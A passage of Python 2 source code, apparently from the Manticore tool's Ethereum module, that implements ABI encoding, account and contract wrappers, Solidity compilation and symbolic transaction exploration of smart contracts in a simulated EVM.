m = re.match(r"(?P<name>[a-zA-Z_]+)(?P<type>\(.*\))", type_spec)
if not m:
raise EthereumError("Function signature expected")
result = ABI.function_selector(type_spec) # Funcid
result += ABI.serialize(m.group('type'), *args)
return result
@staticmethod
def serialize(ty, *value, **kwargs):
'''
Serialize value using type specification in ty.
ABI.serialize('int256', 1000)
ABI.serialize('(int, int256)', 1000, 2000)
'''
try:
parsed_ty = abitypes.parse(ty)
except Exception as e:
# Catch and rebrand parsing errors
raise EthereumError(e.message)
if parsed_ty[0] != 'tuple':
if len(value) > 1:
raise ValueError
value = value[0]
result, dyn_result = ABI._serialize(parsed_ty, value)
return result + dyn_result
@staticmethod
def _serialize(ty, value, dyn_offset=None):
if dyn_offset is None:
dyn_offset = ABI._type_size(ty)
result = bytearray()
dyn_result = bytearray()
if ty[0] == 'int':
result += ABI._serialize_int(value, size=ty[1] / 8, padding=32 - ty[1] / 8)
elif ty[0] in 'uint':
result += ABI._serialize_uint(value, size=ty[1] / 8, padding=32 - ty[1] / 8)
elif ty[0] in ('bytes', 'string'):
result += ABI._serialize_uint(dyn_offset)
dyn_result += ABI._serialize_uint(len(value))
for byte in value:
dyn_result.append(byte)
elif ty[0] == 'function':
result = ABI._serialize_uint(value[0], 20)
result += value[1] + bytearray('\0' * 8)
assert len(result) == 32
elif ty[0] in ('tuple'):
sub_result, sub_dyn_result = ABI._serialize_tuple(ty[1], value, dyn_offset)
result += sub_result
dyn_result += sub_dyn_result
elif ty[0] in ('array'):
rep = ty[1]
base_type = ty[2]
sub_result, sub_dyn_result = ABI._serialize_array(rep, base_type, value, dyn_offset)
result += sub_result
dyn_result += sub_dyn_result
assert len(result) == ABI._type_size(ty)
return result, dyn_result
@staticmethod
def _serialize_tuple(types, value, dyn_offset=None):
result = bytearray()
dyn_result = bytearray()
for ty_i, value_i in zip(types, value):
result_i, dyn_result_i = ABI._serialize(ty_i, value_i, dyn_offset + len(dyn_result))
result += result_i
dyn_result += dyn_result_i
return result, dyn_result
@staticmethod
def _serialize_array(rep, base_type, value, dyn_offset=None):
result = ABI._serialize_uint(dyn_offset)
dyn_result = bytearray()
sub_result = bytearray()
sub_dyn_result = bytearray()
if rep is not None and len(value) != rep:
raise ValueError("More reps than values")
sub_result += ABI._serialize_uint(len(value))
for value_i in value:
result_i, dyn_result_i = ABI._serialize(base_type, value_i, dyn_offset + len(dyn_result))
sub_result += result_i
sub_dyn_result += dyn_result_i
dyn_result += sub_result
dyn_result += sub_dyn_result
return result, dyn_result
@staticmethod
def function_selector(method_name_and_signature):
'''
Makes a function hash id from a method signature
'''
s = sha3.keccak_256()
s.update(str(method_name_and_signature))
return bytearray(binascii.unhexlify(s.hexdigest()[:8]))
@staticmethod
def deserialize(type_spec, data):
try:
if isinstance(data, str):
data = bytearray(data)
assert isinstance(data, (bytearray, Array))
m = re.match(r"(?P<name>[a-zA-Z_]+)(?P<type>\(.*\))", type_spec)
if m and m.group('name'):
# Type has function name. Lets take the function id from the data
# This does not check that the encoded func_id is valid
# func_id = ABI.function_selector(type_spec)
result = (data[:4],)
ty = m.group('type')
result += (ABI._deserialize(abitypes.parse(ty), data[4:]),)
else:
# No function name, just types
ty = type_spec
result = ABI._deserialize(abitypes.parse(ty), data)
return result
except Exception as e:
raise EthereumError(e.message)
@staticmethod
def _deserialize(ty, buf, offset=0):
assert isinstance(buf, (bytearray, Array))
result = None
if ty[0] == 'int':
result = ABI._deserialize_int(buf[offset:offset + 32], nbytes=ty[1] / 8)
elif ty[0] == 'uint':
result = ABI._deserialize_uint(buf[offset:offset + 32], nbytes=ty[1] / 8)
elif ty[0] == 'bytesM':
result = buf[offset:offset + ty[1]]
elif ty[0] == 'function':
address = Operators.ZEXTEND(ABI._readBE(buf[offset:offset + 20], 20, padding=False), 256)
func_id = buf[offset + 20:offset + 24]
result = (address, func_id)
elif ty[0] in ('bytes', 'string'):
dyn_offset = ABI._deserialize_int(buf[offset:offset + 32])
size = ABI._deserialize_int(buf[dyn_offset:dyn_offset + 32])
result = buf[dyn_offset + 32:dyn_offset + 32 + size]
elif ty[0] in ('tuple'):
result = ()
current_off = 0
for ty_i in ty[1]:
result += (ABI._deserialize(ty_i, buf, offset), )
offset += ABI._type_size(ty_i)
elif ty[0] in ('array'):
result = []
dyn_offset = ABI._deserialize_int(buf[offset:offset + 32])
rep = ty[1]
ty_size = ABI._type_size(ty[2])
if rep is None:
rep = ABI._deserialize_int(buf[dyn_offset:dyn_offset + 32])
dyn_offset += 32
for _ in range(rep):
result.append(ABI._deserialize(ty[2], buf, dyn_offset))
dyn_offset += ty_size
else:
raise NotImplemented
return result
@staticmethod
def _serialize_uint(value, size=32, padding=0):
'''
Translates a python integral or a BitVec into a 32 byte string, MSB first
'''
if size <= 0 and size > 32:
raise ValueError
if not isinstance(value, (numbers.Integral, BitVec, EVMAccount)):
raise ValueError
if issymbolic(value):
# FIXME This temporary array variable should be obtained from a specific constraint store
bytes = ArrayVariable(index_bits=256, index_max=32, value_bits=8, name='temp{}'.format(uuid.uuid1()))
value = Operators.ZEXTEND(value, size * 8)
bytes.write_BE(padding, value, size)
else:
value = int(value)
bytes = bytearray()
for _ in range(padding):
bytes.append(0)
for position in reversed(range(size)):
bytes.append(Operators.EXTRACT(value, position * 8, 8))
assert len(bytes) == size + padding
return bytes
@staticmethod
def _serialize_int(value, size=32, padding=0):
'''
Translates a signed python integral or a BitVec into a 32 byte string, MSB first
'''
if size <= 0 and size > 32:
raise ValueError
if not isinstance(value, (numbers.Integral, BitVec)):
raise ValueError
if issymbolic(value):
bytes = ArrayVariable(index_bits=256, index_max=32, value_bits=8, name='temp{}'.format(uuid.uuid1()))
value = Operators.SIGNEXTEND(value, value.size, size * 8)
bytes.write_BE(padding, value, size)
else:
value = int(value)
bytes = bytearray()
for _ in range(padding):
bytes.append(0)
for position in reversed(range(size)):
bytes.append(Operators.EXTRACT(value, position * 8, 8))
return bytes
@staticmethod
def _readBE(data, nbytes, padding=True):
if padding:
pos = 32 - nbytes
size = 32
else:
pos = 0
size = nbytes
values = []
while pos < size:
if pos >= len(data):
values.append(0)
else:
values.append(data[pos])
pos += 1
return Operators.CONCAT(nbytes * 8, *values)
@staticmethod
def _deserialize_uint(data, nbytes=32, padding=0):
"""
Read a `nbytes` bytes long big endian unsigned integer from `data` starting at `offset`
:param data: sliceable buffer; symbolic buffer of Eth ABI encoded data
:param nbytes: number of bytes to read starting from least significant byte
:rtype: int or Expression
"""
assert isinstance(data, (bytearray, Array))
value = ABI._readBE(data, nbytes)
value = Operators.ZEXTEND(value, (nbytes + padding) * 8)
return value
@staticmethod
def _deserialize_int(data, nbytes=32, padding=0):
"""
Read a `nbytes` bytes long big endian signed integer from `data` starting at `offset`
:param data: sliceable buffer; symbolic buffer of Eth ABI encoded data
:param nbytes: number of bytes to read starting from least significant byte
:rtype: int or Expression
"""
assert isinstance(data, (bytearray, Array))
value = ABI._readBE(data, nbytes)
value = Operators.SEXTEND(value, nbytes * 8, (nbytes + padding) * 8)
if not issymbolic(value):
# sign bit on
if value & (1 << (nbytes * 8 - 1)):
value = -(((~value) + 1) & ((1 << (nbytes * 8)) - 1))
return value
class EVMAccount(object):
def __init__(self, address=None, manticore=None, name=None):
''' Encapsulates an account.
:param address: the address of this account
:type address: 160 bit long integer
:param manticore: the controlling Manticore
'''
self._manticore = manticore
self._address = address
self._name = name
def __eq__(self, other):
if isinstance(other, numbers.Integral):
return self._address == other
if isinstance(self, EVMAccount):
return self._address == other._address
return super(EVMAccount, self).__eq__(other)
@property
def name(self):
return self._name
@property
def address(self):
return self._address
def __int__(self):
return self._address
def __str__(self):
return str(self._address)
def __eq__(self, other):
if isinstance(other, EVMAccount):
return self._address == other._address
return self._address == other
class EVMContract(EVMAccount):
''' An EVM account '''
def __init__(self, default_caller=None, **kwargs):
''' Encapsulates a contract account.
:param default_caller: the default caller address for any transaction
'''
super(EVMContract, self).__init__(**kwargs)
self._default_caller = default_caller
self._hashes = None
def add_function(self, signature):
func_id = binascii.hexlify(ABI.function_selector(signature))
func_name = str(signature.split('(')[0])
if func_name.startswith('_') or func_name in {'add_function', 'address', 'name'}:
raise EthereumError("Sorry function name is used by the python wrapping")
if func_name in self._hashes:
raise EthereumError("A function with that name is already defined")
if func_id in {func_id for _, func_id in self._hashes.values()}:
raise EthereumError("A function with the same hash is already defined")
self._hashes[func_name] = signature, func_id
def _null_func(self):
pass
def _init_hashes(self):
#initializes self._hashes lazy
if self._hashes is None and self._manticore is not None:
self._hashes = {}
md = self._manticore.get_metadata(self._address)
if md is not None:
for signature, func_id in md._hashes.items():
self.add_function(signature)
# It was successful, no need to re-run. _init_hashes disabled
self._init_hashes = self._null_func
def __getattribute__(self, name):
''' If this is a contract account of which we know the functions hashes,
this will build the transaction for the function call.
Example use::
#call funtion `add` on contract_account with argument `1000`
contract_account.add(1000)
'''
if not name.startswith('_'):
self._init_hashes()
if self._hashes is not None and name in self._hashes.keys():
def f(*args, **kwargs):
caller = kwargs.get('caller', None)
value = kwargs.get('value', 0)
tx_data = ABI.function_call(str(self._hashes[name][0]), *args)
if caller is None:
caller = self._default_caller
self._manticore.transaction(caller=caller,
address=self._address,
value=value,
data=tx_data)
return f
return object.__getattribute__(self, name)
class ManticoreEVM(Manticore):
''' Manticore EVM manager
Usage Ex::
from manticore.ethereum import ManticoreEVM, ABI
m = ManticoreEVM()
#And now make the contract account to analyze
source_code = """
pragma solidity ^0.4.15;
contract AnInt {
uint private i=0;
function set(uint value){
i=value
}
}
"""
#Initialize user and contracts
user_account = m.create_account(balance=1000)
contract_account = m.solidity_create_contract(source_code, owner=user_account, balance=0)
contract_account.set(12345, value=100)
seth.report()
print seth.coverage(contract_account)
'''
def make_symbolic_buffer(self, size, name='TXBUFFER'):
''' Creates a symbolic buffer of size bytes to be used in transactions.
You can operate on it normally and add constrains to manticore.constraints
via manticore.constrain(constraint_expression)
Example use::
symbolic_data = m.make_symbolic_buffer(320)
m.constrain(symbolic_data[0] == 0x65)
m.transaction(caller=attacker_account,
address=contract_account,
data=symbolic_data,
value=100000 )
'''
return self.constraints.new_array(index_bits=256, name=name, index_max=size, value_bits=8, taint=frozenset())
def make_symbolic_value(self, name='TXVALUE'):
''' Creates a symbolic value, normally a uint256, to be used in transactions.
You can operate on it normally and add constrains to manticore.constraints
via manticore.constrain(constraint_expression)
Example use::
symbolic_value = m.make_symbolic_value()
m.constrain(symbolic_value > 100)
m.constrain(symbolic_value < 1000)
m.transaction(caller=attacker_account,
address=contract_account,
data=data,
value=symbolic_value )
'''
return self.constraints.new_bitvec(256, name=name)
def make_symbolic_address(self, name='TXADDR', select='both'):
if select not in ('both', 'normal', 'contract'):
raise EthereumError('Wrong selection type')
if select in ('normal', 'contract'):
# FIXME need to select contracts or normal accounts
raise NotImplemented
symbolic_address = self.make_symbolic_value(name=name)
constraint = symbolic_address == 0
for contract_account_i in map(int, self._accounts.values()):
constraint = Operators.OR(symbolic_address == contract_account_i, constraint)
self.constrain(constraint)
return symbolic_address
def constrain(self, constraint):
self.constraints.add(constraint)
@staticmethod
def compile(source_code, contract_name=None, libraries=None, runtime=False, solc_bin=None, solc_remaps=[]):
''' Get initialization bytecode from a Solidity source code '''
name, source_code, init_bytecode, runtime_bytecode, srcmap, srcmap_runtime, hashes, abi, warnings = ManticoreEVM._compile(source_code, contract_name, libraries, solc_bin, solc_remaps)
if runtime:
return runtime_bytecode
return init_bytecode
@staticmethod
def _link(bytecode, libraries=None):
has_dependencies = '_' in bytecode
hex_contract = bytecode
if has_dependencies:
deps = {}
pos = 0
while pos < len(hex_contract):
if hex_contract[pos] == '_':
# __/tmp/tmp_9k7_l:Manticore______________
lib_placeholder = hex_contract[pos:pos + 40]
lib_name = lib_placeholder.split(':')[1].split('_')[0]
deps.setdefault(lib_name, []).append(pos)
pos += 40
else:
pos += 2
if libraries is None:
raise DependencyError(deps.keys())
libraries = dict(libraries)
hex_contract_lst = list(hex_contract)
for lib_name, pos_lst in deps.items():
try:
lib_address = libraries[lib_name]
except KeyError:
raise DependencyError([lib_name])
for pos in pos_lst:
hex_contract_lst[pos:pos + 40] = '%040x' % lib_address
hex_contract = ''.join(hex_contract_lst)
return bytearray(binascii.unhexlify(hex_contract))
@staticmethod
def _run_solc(source_file, solc_bin=None, solc_remaps=[]):
''' Compile a source file with the Solidity compiler
:param source_file: a file object for the source file
:param solc_bin: path to solc binary
:param solc_remaps: solc import remaps
:return: output, warnings
'''
if solc_bin is not None:
solc = solc_bin
else:
solc = "solc"
#check solc version
supported_versions = ('0.4.18', '0.4.21')
try:
installed_version_output = check_output([solc, "--version"])
except OSError:
raise EthereumError("Solidity compiler not installed.")
m = re.match(r".*Version: (?P<version>(?P<major>\d+)\.(?P<minor>\d+)\.(?P<build>\d+)).*\+(?P<commit>[^\s]+).*", installed_version_output, re.DOTALL | re.IGNORECASE)
if not m or m.groupdict()['version'] not in supported_versions:
#Fixme https://github.com/trailofbits/manticore/issues/847
#logger.warning("Unsupported solc version %s", installed_version)
pass
#shorten the path size so library placeholders wont fail.
#solc path search is a mess #fixme
#https://solidity.readthedocs.io/en/latest/layout-of-source-files.html
current_folder = os.getcwd()
abs_filename = os.path.abspath(source_file.name)
working_folder, filename = os.path.split(abs_filename)
solc_invocation = [
solc,
]
solc_invocation.extend(solc_remaps)
solc_invocation.extend([
'--combined-json', 'abi,srcmap,srcmap-runtime,bin,hashes,bin-runtime',
'--allow-paths', '.',
filename
])
p = Popen(solc_invocation, stdout=PIPE, stderr=PIPE, cwd=working_folder)
stdout, stderr = p.communicate()
try:
return json.loads(stdout), stderr
except ValueError:
raise EthereumError('Solidity compilation error:\n\n{}'.format(stderr))
@staticmethod
def _compile(source_code, contract_name, libraries=None, solc_bin=None, solc_remaps=[]):
""" Compile a Solidity contract, used internally
:param source_code: solidity source as either a string or a file handle
:param contract_name: a string with the name of the contract to analyze
:param libraries: an itemizable of pairs (library_name, address)
:param solc_bin: path to solc binary
:param solc_remaps: solc import remaps
:return: name, source_code, bytecode, srcmap, srcmap_runtime, hashes
:return: name, source_code, bytecode, runtime, srcmap, srcmap_runtime, hashes, abi, warnings
"""
try:
file_type = file # Python 2
except NameError:
from io import IOBase
file_type = IOBase # Python 3
if isinstance(source_code, str):
with tempfile.NamedTemporaryFile() as temp:
temp.write(source_code)
temp.flush()
output, warnings = ManticoreEVM._run_solc(temp, solc_bin, solc_remaps)
elif isinstance(source_code, file_type):
output, warnings = ManticoreEVM._run_solc(source_code, solc_bin, solc_remaps)
source_code = source_code.read()
else:
raise TypeError
contracts = output.get('contracts', [])
if len(contracts) != 1 and contract_name is None:
raise EthereumError('Solidity file must contain exactly one contract or you must use contract parameter to specify which one.')
name, contract = None, None
if contract_name is None:
name, contract = contracts.items()[0]
else:
for n, c in contracts.items():
if n.split(":")[1] == contract_name:
name, contract = n, c
break
assert(name is not None)
name = name.split(':')[1]
if contract['bin'] == '':
raise EthereumError('Solidity failed to compile your contract.')
bytecode = ManticoreEVM._link(contract['bin'], libraries)
srcmap = contract['srcmap'].split(';')
srcmap_runtime = contract['srcmap-runtime'].split(';')
hashes = dict(((str(x), str(y)) for x, y in contract['hashes'].items()))
abi = json.loads(contract['abi'])
runtime = ManticoreEVM._link(contract['bin-runtime'], libraries)
return name, source_code, bytecode, runtime, srcmap, srcmap_runtime, hashes, abi, warnings
@property
def accounts(self):
return dict(self._accounts)
def account_name(self, address):
for name, account in self._accounts.iteritems():
if account.address == address:
return name
return '0x{:x}'.format(address)
@property
def normal_accounts(self):
return {name: account for name, account in self._accounts.iteritems() if not isinstance(account, EVMContract)}
@property
def contract_accounts(self):
return {name: account for name, account in self._accounts.iteritems() if isinstance(account, EVMContract)}
def get_account(self, name):
return self._accounts[name]
def __init__(self, procs=10, **kwargs):
''' A Manticore EVM manager
:param int procs: number of workers to use in the exploration
'''
self._accounts = dict()
self._config_procs = procs
# Make the constraint store
constraints = ConstraintSet()
# make the ethereum world state
world = evm.EVMWorld(constraints)
initial_state = State(constraints, world)
super(ManticoreEVM, self).__init__(initial_state, **kwargs)
self.constraints = ConstraintSet()
self.detectors = {}
self.metadata = {}
# The following should go to manticore.context so we can use multiprocessing
self.context['seth'] = {}
self.context['seth']['_saved_states'] = set()
self.context['seth']['_final_states'] = set()
self.context['seth']['_completed_transactions'] = 0
self._executor.subscribe('did_load_state', self._load_state_callback)
self._executor.subscribe('will_terminate_state', self._terminate_state_callback)
self._executor.subscribe('did_evm_execute_instruction', self._did_evm_execute_instruction_callback)
self._executor.subscribe('did_read_code', self._did_evm_read_code)
self._executor.subscribe('on_symbolic_sha3', self._symbolic_sha3)
self._executor.subscribe('on_concrete_sha3', self._concrete_sha3)
@property
def world(self):
''' The world instance or None if there is more than one state '''
return self.get_world(None)
@property
def completed_transactions(self):
with self.locked_context('seth') as context:
return context['_completed_transactions']
@property
def _running_state_ids(self):
''' IDs of the running states'''
with self.locked_context('seth') as context:
if self.initial_state is not None:
return tuple(context['_saved_states']) + (-1,)
else:
return tuple(context['_saved_states'])
@property
def _terminated_state_ids(self):
''' IDs of the terminated states '''
with self.locked_context('seth') as context:
return tuple(context['_final_states'])
@property
def _all_state_ids(self):
''' IDs of the all states
Note: state with id -1 is already in memory and it is not backed on the storage
'''
return self._running_state_ids + self._terminated_state_ids
@property
def running_states(self):
''' Iterates over the running states'''
for state_id in self._running_state_ids:
state = self.load(state_id)
yield state
self.save(state, state_id=state_id) # overwrite old
@property
def terminated_states(self):
''' Iterates over the terminated states'''
for state_id in self._terminated_state_ids:
state = self.load(state_id)
yield state
self.save(state, state_id=state_id) # overwrite old
@property
def all_states(self):
''' Iterates over the all states (terminated and alive)'''
for state_id in self._all_state_ids:
state = self.load(state_id)
yield state
self.save(state, state_id=state_id) # overwrite old
def count_states(self):
''' Total states count '''
return len(self._all_state_ids)
def count_running_states(self):
''' Running states count '''
return len(self._running_state_ids)
def count_terminated_states(self):
''' Terminated states count '''
return len(self._terminated_state_ids)
def _terminate_state_id(self, state_id):
''' Manually terminates a states by state_id.
Moves the state from the running list into the terminated list
'''
if state_id != -1:
# Move state from running to final
with self.locked_context('seth') as seth_context:
saved_states = seth_context['_saved_states']
final_states = seth_context['_final_states']
if state_id in saved_states:
saved_states.remove(state_id)
final_states.add(state_id)
seth_context['_saved_states'] = saved_states # TODO This two may be not needed in py3?
seth_context['_final_states'] = final_states
else:
assert state_id == -1
state_id = self.save(self._initial_state, final=True)
self._initial_state = None
return state_id
def _revive_state_id(self, state_id):
''' Manually revice a states by state_id.
Moves the state from the final list into the running list
'''
# Move state from final to running
if state_id != -1:
with self.locked_context('seth') as seth_context:
saved_states = seth_context['_saved_states']
final_states = seth_context['_final_states']
if state_id in final_states:
final_states.remove(state_id)
saved_states.add(state_id)
seth_context['_saved_states'] = saved_states
seth_context['_final_states'] = final_states
return state_id
# deprecate this 5 in favor of for sta in seth.all_states: do stuff?
def get_world(self, state_id=None):
''' Returns the evm world of `state_id` state. '''
state = self.load(state_id)
if state is None:
return None
else:
return state.platform
def get_balance(self, address, state_id=None):
''' Balance for account `address` on state `state_id` '''
if isinstance(address, EVMAccount):
address = int(address)
return self.get_world(state_id).get_balance(address)
def get_storage_data(self, address, offset, state_id=None):
''' Storage data for `offset` on account `address` on state `state_id` '''
if isinstance(address, EVMAccount):
address = int(address)
return self.get_world(state_id).get_storage_data(address, offset)
def get_code(self, address, state_id=None):
''' Storage data for `offset` on account `address` on state `state_id` '''
if isinstance(address, EVMAccount):
address = int(address)
return self.get_world(state_id).get_code(address)
def last_return(self, state_id=None):
''' Last returned buffer for state `state_id` '''
state = self.load(state_id)
return state.platform.last_return_data
def transactions(self, state_id=None):
''' Transactions list for state `state_id` '''
state = self.load(state_id)
return state.platform.transactions
def make_symbolic_arguments(self, types):
'''
Make a reasonable serialization of the symbolic argument types
'''
# FIXME this is more naive than reasonable.
return ABI.deserialize(types, self.make_symbolic_buffer(32, name="INITARGS"))
def solidity_create_contract(self, source_code, owner, name=None, contract_name=None, libraries=None, balance=0, address=None, args=(), solc_bin=None, solc_remaps=[]):
''' Creates a solidity contract and library dependencies
:param str source_code: solidity source code
:param owner: owner account (will be default caller in any transactions)
:type owner: int or EVMAccount
:param contract_name: Name of the contract to analyze (optional if there is a single one in the source code)
:type contract_name: str
:param balance: balance to be transferred on creation
:type balance: int or SValue
:param address: the address for the new contract (optional)
:type address: int or EVMAccount
:param tuple args: constructor arguments
:param solc_bin: path to solc binary
:type solc_bin: str
:param solc_remaps: solc import remaps
:type solc_remaps: list of str
:rtype: EVMAccount
'''
if libraries is None:
deps = {}
else:
deps = dict(libraries)
contract_names = [contract_name]
while contract_names:
contract_name_i = contract_names.pop()
try:
compile_results = self._compile(source_code, contract_name_i, libraries=deps, solc_bin=solc_bin, solc_remaps=solc_remaps)
md = SolidityMetadata(*compile_results)
if contract_name_i == contract_name:
constructor_types = md.get_constructor_arguments()
if args is None:
args = self.make_symbolic_arguments(constructor_types)
contract_account = self.create_contract(owner=owner,
balance=balance,
address=address,
init=md._init_bytecode + ABI.serialize(constructor_types, *args),
name=name)
else:
contract_account = self.create_contract(owner=owner, init=md._init_bytecode)
if contract_account is None:
raise EthereumError("Failed to build contract %s" % contract_name_i)
self.metadata[int(contract_account)] = md
deps[contract_name_i] = contract_account
except DependencyError as e:
contract_names.append(contract_name_i)
for lib_name in e.lib_names:
if lib_name not in deps:
contract_names.append(lib_name)
if not self.count_running_states() or len(self.get_code(contract_account)) == 0:
return None
return contract_account
def create_contract(self, owner, balance=0, address=None, init=None, name=None):
''' Creates a contract
:param owner: owner account (will be default caller in any transactions)
:type owner: int or EVMAccount
:param balance: balance to be transferred on creation
:type balance: int or SValue
:param int address: the address for the new contract (optional)
:param str init: initializing evm bytecode and arguments
:param str name: a uniq name for reference
:rtype: EVMAccount
'''
if not self.count_running_states():
raise NoAliveStates
if address is not None and address in map(int, self.accounts.values()):
# Address already used
raise EthereumError("Address already used")
# Let just choose the address ourself. This is not yellow paper material
if address is None:
address = self.new_address()
# Name check
if name is None:
name = self._get_uniq_name("contract")
if name in self._accounts:
# Account name already used
raise EthereumError("Name already used")
self._transaction('CREATE', owner, balance, address, data=init)
# TODO detect failure in the constructor
self._accounts[name] = EVMContract(address=address, manticore=self, default_caller=owner, name=name)
return self.accounts[name]
def _get_uniq_name(self, stem):
count = 0
for name_i in self.accounts.keys():
if name_i.startswith(stem):
try:
count = max(count, int(name_i[len(stem):]) + 1)
except:
pass
name = "{:s}{:d}".format(stem, count)
assert name not in self.accounts
return name
def new_address(self):
''' Create a fresh 160bit address '''
new_address = random.randint(100, pow(2, 160))
if new_address in map(int, self.accounts.values()):
return self.new_address()
return new_address
def transaction(self, caller, address, value, data):
''' Issue a symbolic transaction in all running states
:param caller: the address of the account sending the transaction
:type caller: int or EVMAccount
:param address: the address of the contract to call
:type address: int or EVMAccount
:param value: balance to be transfered on creation
:type value: int or SValue
:param data: initial data
:raises NoAliveStates: if there are no alive states to execute
'''
self._transaction('CALL', caller, value=value, address=address, data=data)
def create_account(self, balance=0, address=None, code=None, name=None):
''' Low level creates an account. This won't generate a transaction.
:param balance: balance to be set on creation (optional)
:type balance: int or SValue
:param address: the address for the new account (optional)
:type address: int
:param code: the runtime code for the new account (None means normal account) (optional)
:param name: a global account name eg. for use as reference in the reports (optional)
:return: an EVMAccount
'''
# Need at least one state where to apply this
if not self.count_running_states():
raise NoAliveStates
# Name check
if name is None:
if code is None:
name = self._get_uniq_name("normal")
else:
name = self._get_uniq_name("contract")
if name in self._accounts:
# Account name already used
raise EthereumError("Name already used")
#Balance check
if not isinstance(balance, numbers.Integral):
raise EthereumError("Balance invalid type")
if isinstance(code, str):
code = bytearray(code)
if code is not None and not isinstance(code, (bytearray, Array)):
raise EthereumError("code bad type")
# Address check
# Let just choose the address ourself. This is not yellow paper material
if address is None:
address = self.new_address()
if not isinstance(address, numbers.Integral):
raise EthereumError("A concrete address is needed")
assert address is not None
if address in map(int, self.accounts.values()):
# Address already used
raise EthereumError("Address already used")
# To avoid going full crazy we maintain a global list of addresses
# Different states may CREATE a different set of accounts.
# Accounts created by a human have the same address in all states.
for state in self.running_states:
world = state.platform
if '_pending_transaction' in state.context:
raise EthereumError("This is bad. It should not be a pending transaction")
if address in world.accounts:
# Address already used
raise EthereumError("This is bad. Same address used for different contracts in different states")
world.create_account(address, balance, code=code, storage=None)
self._accounts[name] = EVMAccount(address, manticore=self, name=name)
return self.accounts[name]
def __migrate_expressions(self, new_constraints, old_constraints, caller, address, value, data):
# Copy global constraints into each state.
# We should somehow remember what has been copied to each state
# In a second transaction we should only add new constraints.
# And actually only constraints related to whateverwe are using in
# the tx. This is a FIXME
migration_bindings = {}
if issymbolic(caller):
caller = new_constraints.migrate(caller, bindings=migration_bindings)
if issymbolic(address):
address = new_constraints.migrate(address, bindings=migration_bindings)
if issymbolic(value):
value = new_constraints.migrate(value, bindings=migration_bindings)
if issymbolic(data):
data = new_constraints.migrate(data, bindings=migration_bindings)
for c in old_constraints:
new_constraints.constraint(new_constraints.migrate(c, bindings=migration_bindings))
return new_constraints, caller, address, value, data
def _transaction(self, sort, caller, value=0, address=None, data=None, price=1):
''' Creates a contract
:param caller: caller account
:type caller: int or EVMAccount
:param int address: the address for the transaction (optional)
:param value: value to be transferred
:param price: the price of gas for this transaction. Mostly unused.
:type value: int or SValue
:param str data: initializing evm bytecode and arguments or transaction call data
:rtype: EVMAccount
'''
#Type Forgiveness
if isinstance(address, EVMAccount):
address = int(address)
if isinstance(caller, EVMAccount):
caller = int(caller)
#Defaults, call data is empty
if data is None:
data = bytearray(b"")
if isinstance(data, str):
data = bytearray(data)
if not isinstance(data, (bytearray, Array)):
raise EthereumError("code bad type")
# Check types
if not isinstance(caller, numbers.Integral):
raise EthereumError("Caller invalid type")
if not isinstance(value, (numbers.Integral, BitVec)):
raise EthereumError("Value invalid type")
if not isinstance(address, (numbers.Integral, BitVec)):
raise EthereumError("address invalid type")
if not isinstance(price, numbers.Integral):
raise EthereumError("Price invalid type")
# Check argument consistency and set defaults ...
if sort not in ('CREATE', 'CALL'):
raise ValueError('unsupported transaction type')
# Caller must be a normal known account
if caller not in self._accounts.values():
raise EthereumError("Unknown caller address!")
if sort == 'CREATE':
#let's choose an address here for now #NOTYELLOW
if address is None:
address = self.new_address()
# When creating data is the init_bytecode + arguments
if len(data) == 0:
raise EthereumError("An initialization bytecode is needed for a CREATE")
assert address is not None
assert caller is not None
# Transactions (as everything else) needs at least one running state
if not self.count_running_states():
raise NoAliveStates
# To avoid going full crazy we maintain a global list of addresses
for state in self.running_states:
world = state.platform
if '_pending_transaction' in state.context:
raise EthereumError("This is bad. It should not be a pending transaction")
# Migrate any expression to state specific constraint set
_, caller, address, value, data = self.__migrate_expressions(state.constraints, self.constraints, caller, address, value, data)
# Different states may CREATE a different set of accounts. Accounts
# that were crated by a human have the same address in all states.
# This diverges from the yellow paper but at least we check that we
# are not trying to create an already used address here
if sort == 'CREATE':
if address in world.accounts:
# Address already used
raise EthereumError("This is bad. Same address used for different contracts in different states")
state.context['_pending_transaction'] = (sort, caller, address, value, data, price)
# run over potentially several states and
# generating potentially several others
self.run(procs=self._config_procs)
return address
def multi_tx_analysis(self, solidity_filename, contract_name=None, tx_limit=None, tx_use_coverage=True, tx_account="combo1", args=None):
owner_account = self.create_account(balance=1000, name='owner')
attacker_account = self.create_account(balance=1000, name='attacker')
# Pretty print
logger.info("Starting symbolic create contract")
with open(solidity_filename) as f:
contract_account = self.solidity_create_contract(f, contract_name=contract_name, owner=owner_account, args=args)
if tx_account == "attacker":
tx_account = [attacker_account]
elif tx_account == "owner":
tx_account = [owner_account]
elif tx_account == "combo1":
tx_account = [owner_account, attacker_account]
else:
raise EthereumError('The account to perform the symbolic exploration of the contract should be "attacker", "owner" or "combo1"')
if contract_account is None:
logger.info("Failed to create contract. Exception in constructor")
self.finalize()
return
prev_coverage = 0
current_coverage = 0
tx_no = 0
while (current_coverage < 100 or not tx_use_coverage) and not self.is_shutdown():
try:
logger.info("Starting symbolic transaction: %d", tx_no)
# run_symbolic_tx
symbolic_data = self.make_symbolic_buffer(320)
symbolic_value = self.make_symbolic_value()
self.transaction(caller=tx_account[min(tx_no, len(tx_account) - 1)],
address=contract_account,
data=symbolic_data,
value=symbolic_value)
logger.info("%d alive states, %d terminated states", self.count_running_states(), self.count_terminated_states())
except NoAliveStates:
break
# Check if the maximun number of tx was reached
if tx_limit is not None and tx_no + 1 == tx_limit:
break
# Check if coverage has improved or not
if tx_use_coverage:
prev_coverage = current_coverage
current_coverage = self.global_coverage(contract_account)
found_new_coverage = prev_coverage < current_coverage
if not found_new_coverage:
break
tx_no += 1
def run(self, **kwargs):
''' Run any pending transaction on any running state '''
# Check if there is a pending transaction
with self.locked_context('seth') as context:
# there is no states added to the executor queue
assert len(self._executor.list()) == 0
for state_id in context['_saved_states']:
self._executor.put(state_id)
context['_saved_states'] = set()
# A callback will use _pending_transaction and issue the transaction
# in each state (see load_state_callback)
super(ManticoreEVM, self).run(**kwargs)
with self.locked_context('seth') as context:
if len(context['_saved_states']) == 1:
self._initial_state = self._executor._workspace.load_state(context['_saved_states'].pop(), delete=True)
context['_saved_states'] = set()
assert self._running_state_ids == (-1,)
def save(self, state, state_id=None, final=False):
''' Save a state in secondary storage and add it to running or final lists
:param state: A manticore State
:param state_id: if not None force state_id (overwrite)
:param final: True if state is final
:returns: a state id
'''
# If overwriting then the state_id must be known
if state_id is not None:
if state_id not in self._all_state_ids:
raise EthereumError("Trying to overwrite unknown state_id")
with self.locked_context('seth') as context:
context['_final_states'].discard(state_id)
context['_saved_states'].discard(state_id)
if state_id != -1:
# save the state to secondary storage
